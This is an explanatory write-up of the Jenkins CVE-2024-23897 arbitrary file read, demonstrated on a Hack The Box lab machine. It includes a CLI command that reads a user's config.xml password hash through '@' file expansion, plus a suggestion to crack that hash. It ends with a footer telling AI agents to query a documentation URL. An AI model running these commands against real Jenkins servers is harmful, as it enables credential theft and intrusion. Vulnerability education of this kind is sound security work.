# CVE Explained CVE-2024-23897 *** references * [Jenkins-Security-Advisory](https://www.jenkins.io/security/advisory/2024-01-24/) * [CYFIRMA](https://www.cyfirma.com/research/jenkins-cve-2024-23897-vulnerability-analysis-and-exploitation/) * [TRENDMICRO](https://www.trendmicro.com/en_us/research/24/c/cve-2024-23897.html) Exploits: * My python exploit [Here](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2024-23897) *** **Vulnerability Type:** Unauthenticated Remote Code Execution (RCE)\ **CVE ID:** CVE-2024-23897\ **CVSS Severity Score:** 9.8 (Critical)\ **Application:** Jenkins\ **Impact:** Allows unauthenticated attackers to execute arbitrary code and read arbitrary files by exploiting a critical remote code execution vulnerability.\ **Severity:** Critical\ **Affected Versions:** Multiple versions of Jenkins are impacted. Check [here](https://www.jenkins.io/security/advisory/2024-01-24/)\ **Patch Available:** Yes\ **Mitigation:** Organizations are strongly advised to apply the latest security updates and patches promptly. **Affected Versions:** Jenkins 2.441 and earlier, LTS 2.426.2 and earlier. *** ## The Vulnerability The exploitation is possible from `HTTP` ,`CLI`, `websockets`. **The flow** The attacker endpoint makes two different `POST` request.

**Post Request 1** The first `POST` request makes an `upload` request containing the commands and it's arguments. **Post Request 2** The second post request is for the commands to executed and contains the result by the first post request and download the contents of the result. **Why is it happening** Now the whole process involves these methods which start a domino effect that eventually leads to catastrophe , these methods are: 1. CliCrumbExecution : To Validate endpoint via `process` function ```java public class CliCrumbExclusion extends CrumbExclusion { @Override public boolean process(HttpServletRequest request, HttpServletResponse response, FilterChain chain) throws IOException, ServletException { String pathInfo = request.getPathInfo(); if ("/cli".equals(pathInfo)) { chain.doFilter(request, response); return true; } return false; } } ``` 2. FullDuplexHttpService : This handles the `request` and `response` via 3 methods: 1. generateResponse: 1. This method calls the other two methods on the basis of header called `side` and seeing the `uuid` string {which we generated random in exploit} 2. ```

Look at the Session header and Side header {You'll understand the exploit written}

``` 2. Download 3. Upload 3. PlainCLIProtocol: This is the method that continuously reads frames from the input stream and handles frame on it's length 4. CLICommand: This method actually contains the vulnerable code which is the `CmdLineParser` which is the part of the `args4j` library responsible for the vulnerability.

Calling the args4j's method CmdLineParser

Now when we look at the code for this `args4j` -> we find this `parseArgument` function which eventually calls the `expandAtFiles` method which is the actual vulnerable code:

now look at this function :

what it does: 2. For each element, if it starts with the character `'@'`, it is treated as a file reference. It then: * Removes the `'@'` character from the beginning to obtain the file path. * Checks if the file exists. If not, it throws a `CmdLineException` with an appropriate error message. * Reads all lines from the file and adds them to the `result` list. ## How to exploit: Using the HACK-THE-BOX's machine called [Builder](https://app.hackthebox.com/machines/Builder) for such. #### CLI Version [Jenkins](https://www.jenkins.io/doc/book/managing/cli/#downloading-the-client) says that we can access the jenkins via the `jenkins-cli` and download when we setup jenkins , now since we have the jenkins already setup , we can download it from here: See that's why I said earlier `websocket` and `HTTP`:

``` wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar ``` we send the request:

We also get the response in form of error

Looking at the wireshark for what it did in bg:

**Reading Sensitive files** Now what I can do here is read the files which contains the hash of the user : ``` java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml' ```

I can leverage this information and get the password by cracking it , considering the possibility , it's weak. I also wrote the python exploit for the same , can be accessed [here](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2024-23897) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2024-23897.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.